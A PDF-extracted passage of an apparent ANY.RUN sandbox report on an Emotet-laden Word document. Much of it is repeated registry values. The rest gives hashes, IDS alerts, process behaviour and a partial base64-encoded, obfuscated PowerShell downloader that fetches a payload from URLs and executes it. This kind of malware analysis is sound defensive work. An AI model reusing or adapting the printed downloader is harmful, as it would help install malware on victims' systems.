Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 26/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 27/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 28/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 29/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 30/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 31/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 32/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 33/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 34/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 35/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 36/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value: 0
Value:
Value: Cookie:
Value: Visited:
Value: 0
Value: 460000003B010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016400000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 37/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 1
Value: AD686852DB8AD701
Value: Network 3
Value: 1
Value: AD686852DB8AD701
Value: 0
Value:
Value: 093D1B5BDB8AD701
Value: 093D1B5BDB8AD701
Value:
Value: BDFBA783DB8AD701
Value: BDFBA783DB8AD701
Value: E3E0469DDB8AD701
Value: E3E0469DDB8AD701
Value: 27A5AEB9DB8AD701
Value: 27A5AEB9DB8AD701
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 38/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: 9B5347EADB8AD701
Value: 9B5347EADB8AD701
Files activity
Executable files Suspicious files Text files Unknown types
2 3 0 3
Dropped files
Network activity
HTTP(S) requests TCP/UDP connections DNS requests Threats
18 25 4 27
HTTP requests
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 39/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Connections
DNS requests
Domain IP Reputation
erkala.com — whitelisted
Threats
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 40/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
3828 POwersheLL.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
3828 POwersheLL.exe Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
General Info
File name: CMO-100120 CDW-102220.doc
Threats: Emotet
Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even
private users get infected in mass spam email campaigns.
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Minima., Author: Mael Schneider, Template: Normal.dotm, Last Saved By: Noa Masson,
Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Oct 22 07:54:00 2020, Last Saved Time/Date: Thu Oct 22 07:54:00 2020, Number of Pages: 1,
Number of Words: 3675, Number of Characters: 20950, Security: 8
MD5: 27E3A6A2A661389C26F2CA9CBF39CC0F
SHA1: 91257B16C8EA0A0C236F9824672ABF04E118C5C9
SHA256: E2D2EBAFC33D7C7819F414031215C3669BCCDFB255AF3CBE0177B2C601B0E0CD
SSDEEP: 3072:aJivKie6B/w2yiWydwLQ/qR+zAf0Yjau23RW9Wn:aJiP/w2PtqReAf0YjARW9
Launch configuration
Task duration: 300 seconds Heavy Evasion option: off Network geolocation: off
Additional time used: 240 seconds MITM proxy: off Privacy: Public submission
Fakenet option: off Route via Tor: off Autoconfirmation of UAC: on
Network: on
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 41/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
FileZilla Client 3.51.0 (3.51.0) InternetExplorer Optional Package
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000) KB2579686
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 42/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB2862335
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000) KB3074543
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 43/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000) KB3092601
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000) KB3109103
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005) KB3170735
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702) KB3179573
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702) KB3184143
KB4567409
KB958488
KB976902
KB982018
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
RollupFix
UltimateEdition
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 44/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Behavior activities
MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process Checks supported languages Reads the computer name
regidle.exe (PID: 3164) POwersheLL.exe (PID: 3828) WINWORD.EXE (PID: 2728)
G_jugk.exe (PID: 1640) regidle.exe (PID: 3164)
Creates files in the user directory
G_jugk.exe (PID: 1640)
EMOTET was detected WINWORD.EXE (PID: 2728)
regidle.exe (PID: 3164) Reads the computer name
Checks supported languages
POwersheLL.exe (PID: 3828)
Drops executable file immediately after starts WINWORD.EXE (PID: 2728)
regidle.exe (PID: 3164)
G_jugk.exe (PID: 1640)
G_jugk.exe (PID: 1640) Reads mouse settings
Connects to CnC server WINWORD.EXE (PID: 2728)
regidle.exe (PID: 3164) Reads the date of Windows installation
POwersheLL.exe (PID: 3828) Reads Microsoft Office registry keys
WINWORD.EXE (PID: 2728)
PowerShell script executed
POwersheLL.exe (PID: 3828)
Malware configuration
No Malware configuration.
Static information
TRiD EXIF
Subject:
Keywords:
Comments:
Template: Normal.dotm
RevisionNumber: 1
TotalEditTime: 0
Pages: 1
Words: 3675
Characters: 20950
Security: Locked for annotations
Company:
Lines: 174
Paragraphs: 49
CharCountWithSpaces: 24576
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs: Title
LocaleIndicator: 1033
TagE: Sapiente animi numquam iure aut. Tempore saepe nam aut
ratione ipsa vel tempore quae. Sequi repellendus quia et
voluptatem.
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 45/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
CompObjUserTypeLen: 32
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 46/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Processes
Total processes Monitored processes Malicious processes Suspicious processes
45 4 2 1
Behavior graph
start winword.exe
no specs
powershell.exe
#EMOTET
g_jugk.exe drop and start regidle.exe
Specs description
Program did not start Low-level access to the HDD Process was added to the startup Debug information is available
Probably Tor was used Behavior similar to spam Task has injected processes Executable file was dropped
Known threat RAM overrun Network attacks were detected Integrity level elevation
Connects to the network CPU overrun Process starts the services System was rebooted
File is detected by antivirus software Inspected object has suspicious PE Behavior similar to exploiting Task contains an error or was
structure the vulnerability rebooted
Process information
Information
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 47/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 48/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
QAE8AJwArACcAMwAnACkAKwAoACcAMgB3ACcAKwAnAGkAJ
wApACsAKAAnAGsAaQAnACsAJwBiAHIAaQAnACkAKwAnAGMA
bwAnACsAKAAnAGwAJwArACcAYQBnAGUALgBjAG8AbQAnACs
AJwA9ACcAKwAnAFAAJwArACcATwAzADIAdwBwACcAKwAnAC
0AJwArACcAYQBkAG0AaQAnACkAKwAoACcAbgA9AFAAJwArA
CcATwAnACkAKwAoACcAMwAyAFgAaQAnACsAJwBaACcAKQAr
ACgAJwByAGIAJwArACcAeQA9AFAAJwApACsAJwBPACcAKwA
nADMAMgAnACkALgAiAFIAYABFAFAATABBAGAAYwBFACIAKAA
oACgAJwA9AFAATwAnACsAJwAzACcAKQArACcAMgAnACkALA
AnAC8AJwApAC4AIgBTAFAAbABgAEkAdAAiACgAJABCAGgAeQ
BiAGQAZQBmACAAKwAgACQAWQAzADgAMABvADEAZgAgACs
AIAAkAEEAXwBiAGYAaABrAGgAKQA7ACQAUQA1ADIAbAA5AGo
ANwA9ACgAJwBVADUAJwArACgAJwBmACcAKwAnAGIAMwAn
ACkAKwAnAHQAdgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKA
AkAFcAeAB5AG4AagAxADkAIABpAG4AIAAkAEcAXwBhAHcAaA
BpADkAKQB7AHQAcgB5AHsAJABTAGwAbAA4AG8AawB1AC4AI
gBkAGAAbwBXAG4ATABvAEEARABmAGAAaQBsAGUAIgAoACQ
AVwB4AHkAbgBqADEAOQAsACAAJABTAGcAdwBxADcANwA5A
CkAOwAkAEMAMQA0AHQAbABfAGIAPQAoACcATAAnACsAKAA
nAG0AOAAnACsAJwA5AHMAdgBkACcAKQApADsASQBmACAA
KAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACc
AbQAnACkAIAAkAFMAZwB3AHEANwA3ADkAKQAuACIAbABFAG
AATgBHAGAAVABoACIAIAAtAGcAZQAgADQANAA2ADgANgApA
CAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAJwAr
ACgAJwBpAG4AMwAyACcAKwAnAF8AUAAnACkAKwAoACcAcg
BvAGMAZQAnACsAJwBzAHMAJwApACkAKQAuACIAYwBgAFIA
YABlAGEAVABFACIAKAAkAFMAZwB3AHEANwA3ADkAKQA7ACQ
ARwBjAGEAMwBiAGYANQA9ACgAJwBQACcAKwAoACcAagBrAD
AAZQAnACsAJwBjAHQAJwApACkAOwBiAHIAZQBhAGsAOwAkA
EMAYgByAHMAeQBzAHgAPQAoACcAUAAnACsAKAAnADYAJwA
rACcAdwBtADkAdQBoACcAKQApAH0AfQBjAGEAdABjAGgAewB9
AH0AJABLAG0AdABxAHUAZwBjAD0AKAAoACcAWgBoAHoAJw
ArACcAMQAnACkAKwAoACcAMwBnACcAKwAnAG0AJwApACkA
Information
Information
Information
Registry activity
Total events Read events Write events Delete events
Modification events
Value: 2C783300A80A0000010000000000000000000000
Value: Off
Value: Off
Value: Off
Value: Off
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 49/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Value: Off
Value: Off
Value: Off
Files activity
Executable files Suspicious files Text files Unknown types
2 3 0 3
Dropped files
Network activity
HTTP(S) requests TCP/UDP connections DNS requests Threats
18 25 4 27
HTTP requests
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 50/51
21/03/2023, 12:08 Malware analysis CMO-100120 CDW-102220.doc Malicious activity | ANY.RUN - Malware Sandbox Online
Connections
DNS requests
Domain IP Reputation
erkala.com — whitelisted
Threats
3828 POwersheLL.exe Potential Corporate Privacy Violation ET POLICY PE EXE or DLL Windows file download HTTP
3828 POwersheLL.exe Potentially Bad Traffic ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
3164 regidle.exe Potentially Bad Traffic AV POLICY HTTP traffic on port 443 to IP host (POST)
3164 regidle.exe Potentially Bad Traffic ET POLICY HTTP traffic on port 443 (POST)
https://any.run/report/e2d2ebafc33d7c7819f414031215c3669bccdfb255af3cbe0177b2c601b0e0cd/90b76d7b-8df6-43c5-90ec-d4bbcfb4fa19 51/51